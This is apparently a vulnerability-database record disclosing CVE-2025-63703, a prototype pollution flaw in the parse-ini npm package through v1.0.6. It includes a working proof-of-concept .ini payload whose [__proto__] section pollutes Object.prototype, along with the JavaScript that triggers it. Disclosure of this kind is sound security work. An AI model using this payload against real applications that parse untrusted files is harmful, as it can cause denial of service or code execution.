{"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription:\nThere is a prototype pollution vulnerability in the parse-ini npm package, specifically on lines 101 and 104 of index.js,\nwhere the code does not check for the presence of attacker-controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects;\nthis can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n\nPayload used (file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}